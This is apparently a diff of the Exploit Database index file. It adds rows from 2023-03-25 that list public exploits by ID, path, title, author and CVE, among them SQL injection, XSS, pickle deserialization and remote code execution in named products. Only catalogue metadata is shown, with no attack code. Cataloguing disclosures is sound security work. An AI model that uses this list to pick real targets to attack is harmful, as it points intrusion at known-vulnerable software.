 27658,exploits/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 - HTML Injection",2006-04-15,Qex,webapps,php,,2006-04-15,2013-08-18,1,,,,,,https://www.securityfocus.com/bid/17537/info
 50461,exploits/php/webapps/50461.html,"PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)",2021-10-28,"Anubhav Singh",webapps,php,,2021-10-28,2021-10-28,0,,,,,,
+51061,exploits/php/webapps/51061.txt,"PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS",2023-03-25,"Prasheek Kamble",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
 24217,exploits/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 - 'admin.php3' Arbitrary File Access",2004-06-15,HEX,webapps,php,,2004-06-15,2013-01-19,1,CVE-2004-2717;OSVDB-7150,,,,,https://www.securityfocus.com/bid/10556/info
 24216,exploits/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 - 'edituser.php3?do_not_login' Authentication Bypass",2004-06-15,HEX,webapps,php,,2004-06-15,2013-01-19,1,CVE-2004-2715;OSVDB-7149,,,,,https://www.securityfocus.com/bid/10556/info
 25659,exploits/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 - 'Start-Page.CSS.php3' Cross-Site Scripting",2005-05-13,Megasky,webapps,php,,2005-05-13,2013-05-23,1,CVE-2005-1619;OSVDB-16769,,,,,https://www.securityfocus.com/bid/13627/info
@@ -29110,6 +29125,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30811,exploits/php/webapps/30811.txt,"SimpleGallery 0.1.3 - 'index.php' Cross-Site Scripting",2007-11-26,JosS,webapps,php,,2007-11-26,2014-01-10,1,CVE-2007-6157;OSVDB-39679,,,,,https://www.securityfocus.com/bid/26585/info
 38115,exploits/php/webapps/38115.txt,"SimpleInvoices invoices Module - Customer Field Cross-Site Scripting",2012-12-10,tommccredie,webapps,php,,2012-12-10,2015-09-09,1,CVE-2012-4932;OSVDB-88330,,,,,https://www.securityfocus.com/bid/56882/info
 9336,exploits/php/webapps/9336.txt,"SimpleLoginSys 0.5 - Authentication Bypass",2009-08-03,SirGod,webapps,php,,2009-08-02,,1,OSVDB-63093;CVE-2009-4733;OSVDB-56747,,,,,
+51057,exploits/php/webapps/51057.txt,"SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-26982,,,,,
 3886,exploits/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - 'print.php?news_id' SQL Injection",2007-05-09,Silentz,webapps,php,,2007-05-08,,1,OSVDB-35910;CVE-2007-2598,,,,,
 31929,exploits/php/webapps/31929.txt,"SimpleNotes - Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,sl4xUz,webapps,php,,2008-06-16,2014-02-27,1,,,,,,https://www.securityfocus.com/bid/29755/info
 48424,exploits/php/webapps/48424.txt,"SimplePHPGal 0.7 - Remote File Inclusion",2020-05-05,h4shur,webapps,php,,2020-05-05,2020-05-05,0,,,,,,
@@ -30505,6 +30521,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15826,exploits/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",webapps,php,,2010-12-25,2010-12-26,0,,,,,http://www.exploit-db.comTraidnt_up_V3.0.zip,
 36736,exploits/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",webapps,php,,2015-04-13,2015-04-13,0,OSVDB-120607,,,,,
 5848,exploits/php/webapps/5848.txt,"traindepot 0.1 - Local File Inclusion / Cross-Site Scripting",2008-06-18,"CWH Underground",webapps,php,,2008-06-17,2016-12-08,1,OSVDB-46509;CVE-2008-2839;OSVDB-46508;CVE-2008-2838,,,,,
+51043,exploits/php/webapps/51043.txt,"Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-3141,,,,,
 11155,exploits/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comtransloader.zip,
 6360,exploits/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,webapps,php,,2008-09-02,,1,OSVDB-49430,,,,,http://www.bugreport.ir/index_51.htm
 8943,exploits/php/webapps/8943.txt,"TransLucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,webapps,php,,2009-06-11,2016-12-21,1,OSVDB-55385;CVE-2009-2145;OSVDB-55384;OSVDB-55383,,,,,http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html
@@ -33826,6 +33843,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 22877,exploits/php/webapps/22877.txt,"Yii Framework 1.1.8 - Search SQL Injection",2012-11-21,Juno_okyo,webapps,php,,2012-11-21,2012-11-21,0,OSVDB-87828,,,,http://www.exploit-db.comyii-1.1.8.r3324.tar.gz,
 23175,exploits/php/webapps/23175.txt,"yMonda Thread-IT 1.6 - Multiple HTML Injections",2003-09-24,"Bahaa Naamneh",webapps,php,,2003-09-24,2012-12-05,1,OSVDB-3367,,,,,https://www.securityfocus.com/bid/8692/info
 41104,exploits/php/webapps/41104.txt,"Yoga and Fitness Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,,
+51048,exploits/php/webapps/51048.txt,"Yoga Class Registration System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
 43282,exploits/php/webapps/43282.txt,"Yoga Class Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2017-12-13,1,CVE-2017-17630,"SQL Injection (SQLi)",,,,
 8932,exploits/php/webapps/8932.txt,"yogurt 0.3 - Cross-Site Scripting / SQL Injection",2009-06-11,Br0ly,webapps,php,,2009-06-10,,1,OSVDB-55098;CVE-2009-2034;OSVDB-55097;CVE-2009-2033,,,,,
 32200,exploits/php/webapps/32200.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'album.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,webapps,php,,2008-08-09,2014-03-12,1,CVE-2008-3668;OSVDB-47643,,,,,https://www.securityfocus.com/bid/30618/info
@@ -34116,11 +34134,13 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python,,2017-03-24,2017-04-04,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/a93aef8b7adecc4059c6cf168dd181e169cbc0b2/modules/exploits/linux/http/logsign_exec.rb
 46075,exploits/python/remote/46075.rb,"Mailcleaner - (Authenticated) Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443,2019-01-07,2019-03-17,0,,"Metasploit Framework (MSF)",,,,
 41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,remote,python,22,2017-04-27,2017-04-27,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/bbee7f86b5c1bd8b2e245b98fce1cb858b327948/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
+51051,exploits/python/remote/51051.txt,"NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle",2023-03-25,"Elias Hohl",remote,python,,2023-03-25,2023-03-25,0,CVE-2022-34668,,,,,
 46645,exploits/python/remote/46645.py,"PhreeBooks ERP 5.2.3 - Remote Command Execution (1)",2019-04-03,"Metin Yunus Kandemir",remote,python,80,2019-04-03,2021-02-05,0,,,,,http://www.exploit-db.comRelease5.2.3BizunoLib3.1.7.tar.gz,
 50918,exploits/python/remote/50918.txt,"PyScript - Read Remote Python Source Code",2022-05-11,"Momen Eldawakhly",remote,python,,2022-05-11,2022-05-11,0,CVE-2022-30286,,,,,
 50983,exploits/python/remote/50983.py,"rpc.py 0.6.0 - Remote Code Execution (RCE)",2022-07-29,"Elias Hohl",remote,python,,2022-07-29,2022-07-29,0,CVE-2022-35411,,,,,
 42251,exploits/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",remote,python,443,2017-06-26,2017-06-26,1,CVE-2017-6326,"Metasploit Framework (MSF)",,,,
 37814,exploits/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution (Metasploit)",2015-08-18,Metasploit,remote,python,,2015-08-18,2015-08-18,1,OSVDB-126453,"Metasploit Framework (MSF)",,,,
+51041,exploits/python/webapps/51041.txt,"_camp_ Raspberry Pi camera server 1.0 -  Authentication Bypass",2023-03-25,"Elias Hohl",webapps,python,,2023-03-25,2023-03-25,0,CVE-2022-37109,,,,,
 48886,exploits/python/webapps/48886.txt,"aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)",2020-10-16,"Ünsal Furkan Harani",webapps,python,,2020-10-16,2020-10-16,0,,,,,,
 47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python,,2019-10-14,2019-10-14,0,,,,,,
 48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python,,2020-10-23,2020-10-23,0,,,,,,
@@ -40887,6 +40907,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50009,exploits/windows/local/50009.txt,"SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,,2021-06-15,2021-06-15,0,,,,,http://www.exploit-db.comsysgaugesrv_setup_v7.9.18.exe,
 44455,exploits/windows/local/44455.py,"SysGauge Pro 4.6.12 - Local Buffer Overflow (SEH)",2018-04-16,"Hashim Jawad",local,windows,,2018-04-16,2018-04-16,0,,,,,http://www.exploit-db.comsysgaugepro_setup_v4.6.12.exe,
 49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,,2020-12-14,2020-12-14,0,,,,,,
+51044,exploits/windows/local/51044.txt,"System Mechanic v15.5.0.61 - Arbitrary Read/Write",2023-03-25,"Brandon Marshall",local,windows,,2023-03-25,2023-03-25,0,CVE-2018-5701,,,,,
 43929,exploits/windows/local/43929.c,"System Shield 5.0.0.136 - Privilege Escalation",2018-01-30,"Parvez Anwar",local,windows,,2018-01-30,2018-01-30,0,CVE-2018-5701,,,,,
 35812,exploits/windows/local/35812.py,"T-Mobile Internet Manager - Local Buffer Overflow (SEH)",2015-01-18,metacom,local,windows,,2015-02-03,2016-10-10,1,OSVDB-117457,,,,http://www.exploit-db.comwinui.zip,
 38603,exploits/windows/local/38603.py,"TCPing 2.1.0 - Local Buffer Overflow",2015-11-02,hyp3rlinx,local,windows,,2015-11-02,2016-10-10,1,OSVDB-129810,,,,http://www.exploit-db.comtcping2.zip,http://hyp3rlinx.altervista.org/advisories/AS-TCPING-2.1.0-BUFFER-OVERFLOW.txt